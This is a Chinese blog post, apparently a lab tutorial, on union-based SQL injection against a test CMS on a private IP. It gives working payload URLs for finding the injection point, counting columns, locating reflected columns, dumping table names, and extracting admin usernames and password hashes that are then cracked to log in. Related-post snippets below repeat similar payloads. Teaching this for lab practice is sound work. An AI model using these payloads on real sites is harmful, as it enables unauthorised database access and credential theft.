01-sql-联合查询

最新推荐文章于 2024-03-20 19:06:58 发布
最新推荐文章于 2024-03-20 19:06:58 发布
阅读量453 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 杂记
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.youkuaiyun.com/weixin_46439278/article/details/109147763
本文详细介绍了如何利用SQL联合查询进行网站安全测试,包括探测网站是否存在注入点,查询数据库中数据表的列数,寻找回显位以及查询潜在的账号密码信息。通过示例展示了order by、union select等技术的运用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

01-sql-联合查询

查询

语法

select… union select…

条件

1.查询的两张表具有列数
2.查询的两张表具有相同的字段

过程

探测网站是否存在注入点

在这里插入图片描述
打开网站主页,随便打开一个一条新闻

http://192.168.36.131/cms/show.php?id=33

在这里插入图片描述
可以看到URL中出现id,改变id值,页面出现跳转

http://192.168.36.131/cms/show.php?id=34

在这里插入图片描述

查询当前数据库中数据表的列数

使用order by查询当前数据库中数据表的列数

http://192.168.36.131/cms/show.php?id=34 order by 15

在这里插入图片描述

此处页面正常显示

查找回显位

以下接着进行联合查询

http://192.168.36.131/cms/show.php?id=34 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

在这里插入图片描述
页面没有回显,将id的值置为假

http://192.168.36.131/cms/show.php?id=-34 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

在这里插入图片描述
发现有2个回显位(3号位和11号位)

查询当前数据库中数据表的列数

http://192.168.36.131/cms/show.php?id=-34 union select 1,2,hex(table_name),4,5,6,7,8,9,10,database(),12,13,14,15 from information_schema.tables where table_schema=database()

在这里插入图片描述
对表名进行解码(十六进制)
(636D735F61727469636C65)转换得到当前表名(cms_article)
为了得到当前数据库的所有表名,使用groupconcat()

http://192.168.36.131/cms/show.php?id=-34 union select 1,2,hex(group_concat(table_name)),4,5,6,7,8,9,10,database(),12,13,14,15 from information_schema.tables where table_schema=database()

(636D735F61727469636C652C636D735F63617465676F72792C636D735F66696C652C636D735F667269656E646C696E6B2C636D735F6D6573736167652C636D735F6E6F746963652C636D735F706167652C636D735F7573657273)十六进制转换得到(cms_article,cms_category,cms_file,cms_friendlink,cms_message,cms_notice,cms_page,cms_users)

查询数据后台账号和密码

根据得到的数据表名,猜想数据库账号和密码存储在cms_users中,对cms_users进行查询

http://192.168.36.131/cms/show.php?id=-34 union select 1,2,concat(username,0x2a,password),4,5,6,7,8,9,10,database(),12,13,14,15 from cms_users

在这里插入图片描述
MD5解码得到密码是123456
在这里插入图片描述
至此成功登陆网站后台

NL2SQL进阶系列(5):论文解读业界前沿方案(DIN-SQL、C3-SQL、DAIL-SQLSQL-PaLM)、新一代数据集BIRD-SQL解读
丨汀、的博客
04-15 2552
NL2SQL进阶系列(5):论文解读业界前沿方案(DIN-SQL、C3-SQL、DAIL-SQL)、新一代数据集BIRD-SQL解读
SQL注入原理及实践(一)--SQL注入之联合查询
dulirongdudu的博客
06-23 1416
SQL注入原理及实践(一)–SQL注入之联合查询 1)判断注入类型 一般采用【1and1=2】去判断,当输入【1and1=2】时, 如果报错,则为数字型注入, 如果显示正常,则为字符型注入 原理如下: 假设数据库执行命令为:select * from table_name where id=$id $id为用户所控,当输入【1and1=2】时 如果该注入为数字型,则将会显示如下: select * from table_name where id=1and1=2 该语句中,id=1为真;1=2为假;an
16.数据的联合查询操作
天天向上
08-11 207
1. 联合查询 描述:将多条查询语句的结果集合并成一个结果 特点: 多条查询语句列数保持一致,否则报错 最终结果集列名为查询语句1的查询列名 多条查询语句的列名含义保持一致,虽然不一致不报错,但这是没有意义的 union关键字会默认去除最终结果集的重复记录,使用union all关键字可以取消去重 # 语法 SELECT 查询列表 FROM 数据表列表 WHERE 筛选条件 UNION SELECT 查询列表 FROM 数据表列表 WHERE 筛选条件 UNION ......; # 实例
sql注入之联合查询(Mysql
华丽的贵族
09-05 1467
联合注入 - 测试网站 phpstudy搭建的mysql网站 http://localhost/pentest/article.php?id=1 - 注入步骤 1.判断是否存在注入 输入and 1=1 未报错 输入and 1=2 报错 2.获取字段的总数: order by +数字 数字从144报错,所以网站字段为3 3.进行连接查询 http://localhost/pentest...
如何在MySQL 进行一个联合查询
Soup's Blog
07-01 1042
参考文章: https://www.jianshu.com/p/95c170ab5513 https://blog.youkuaiyun.com/weixin_39411321/article/details/90602030 MySQL除了普通的增删改查的sql 用的多以外,像多表查询其实在项目里用的是非常多的,下面就随着小编一起看下去吧 1) 知识体系 2)表 我这边准备了俩张表show_column 和user_coulmn ,show_column的id 和 user_co...
3-8SQL注入网站实际案例第四步:第三者上位点测试与利用
山兔的博客
02-20 597
判断出注入点的位置,那我们采取的就是显注的策略,显注的策略,就要充分发挥第三者上位点的作用,我们本篇将探讨如何对第三者上位点进行测试,以便充分利用上位点的作用 1.Union寻找处理字段数和第三者上位点 1.Union寻找程序处理字段数 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 – 我们在上一篇文章已经接触过了,寻找程序处理字段
mysqlunion 组合查询
非著名程序猿
03-15 2887
issue表 employee_table表 Union基础方法 -- union 去除重复 SELECT 1, 2 UNION SELECT 1, 2; -- union all 关联所有 包含重复 SELECT 1, 2 UNION ALL SELECT 1, 2; Union使用规则 Union有他的强大之处,详细介绍之前,首先明确一下Union的使用注意规则。 Union必须由两条或者两条以上的SELECT语句组成,语句之间使用Union链接。 Union中的每个查询必须包含相同的列
数据查询-宁剑-SQL实验报告3.docx
最新发布
07-17
在本次实验报告中,涉及到了Transact-SQL(T-SQL)的查询操作,T-SQL是Microsoft对ANSI SQL标准的实现,扩展了SQL语言,提供了更多的功能。 首先,简单查询操作包括投影、选择条件表达、数据排序和使用临时表等。...
MyBatis-Plus多表联合查询并且分页(3表联合)
08-24
MyBatis-Plus 多表联合查询并且分页(3 表联合) MyBatis-Plus 是一个基于 MyBatis 的增强型 ORM 框架,提供了很多实用的功能,例如多表联合查询和分页等。下面我们将详细介绍如何使用 MyBatis-Plus 实现多表联合...
SQL-Interview-questions.rar_sql 联合查询
09-19
一些经典的SQL复杂查询、联合查询、交叉查询等操作
浅谈SQL注入中的-1union select 1,2,3#
dzqxwzoe的博客
03-12 2082
经过本文的阅读,相信小白已经可以理解SQL注入语句中的这条语句了吧?将上面所有的内容概括为一句话就是大家常说的:判断回显位。当然,这条语句并不是固定的,要根据目标数据库返回的报错信息等各种情况来构造针对目标数据库的SQL注入语句。
sql注入中的union联合查询union select 1,2,3
m0_51756263的博客
07-10 1万+
sql注入中的union联合查询union select 1,2,3
SQL注入自己接触过的类型(自我小总结)
2302_80935968的博客
03-20 709
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,* from admin (错误)id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from admin (错误)id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin (正确)
初学SQL 注入之常见的几种注入类型
Just Do IT
12-21 3968
SQL注入原理 老生常谈,SQL注入攻击的本质就是把用户输入的参数当做SQL语句来执行,Web应用程序对用户输入数据的合法性没有判断和过滤,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。比如增删改查等,如果数据库的用户权限足够大,还可以对操作系统执行操作。 这里需要满足2个条件: 1.用户可以控制自己的输入 2.输入得参数可以被拼接成sql语句执行。 危害:造成信息泄露,上传webshell,篡改网页信息等。 SQL注入分类 0x00 联合注入 原理没什么好说的,最简单的一种注入方式,下面直接
为什么sql注入的时候会写union select 12~~~~~from admin
被遗弃的庸才博客
04-15 1万+
我也是最近好奇才去学了一点web渗透的知识。在这之前还是需要一定的数据库的相关知识。这里假设知道当前表有多少列(这里设置为10),也可以直接通过order by直接测试出来。union 是联和查询的一个关键字,这个有一个前提就是必须满足所有的列是相同的,所以在这前面必须要添加一些没有意义的列来作为填充。这里给一个网站大家可以去看看,我忘记是在哪里看到了,反正可以用。http://www.joesd...
web渗透部分笔记(一)
学吧
06-20 560
web渗透笔记
SQL注入02union联合查询注入实例操作
Fighting_hawk的博客
02-18 4660
1. 掌握union联合查询注入的流程; 2. 理解union联合查询的限制条件; 3. 查询语句中尽可能减少字符串的使用,可以转为使用SQL内置函数或转为16进制码。
SQL注入知识总结
ma963852的博客
03-30 1万+
目录 漏洞原理 漏洞危害 利用方式 手工注入 手工注入步骤-基于联合查询1、判断注入类型 ​2、查询字段数 3、判断回显位 4、查询数据库的基本信息 5、查询数据库中的数据 报错注入 xpath语法错误 ​ 无回显无报错 1,布尔盲注 2,时间盲注 3,带外注入 4SQL注入命令执行一 4SQL注入命令执行二 堆叠注入 HTTP头注入 宽字节注入 二次注入 自动化注入 SQLMAP sqlmap特性 输出的内容 设定目标 综...
SQL注入篇——sqli-labs最详细1-40闯关指南
热门推荐
爱国小白帽
01-11 3万+
使用sqli­labs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less­1进入第一关,在网址中添加标红内容,显示了用户和密码 http://localhost/sqli­labs­master/Less­1/index.php?id=1’ and 1=1 ­­ ­ 把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入 二.进入第二关,在网址中添...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值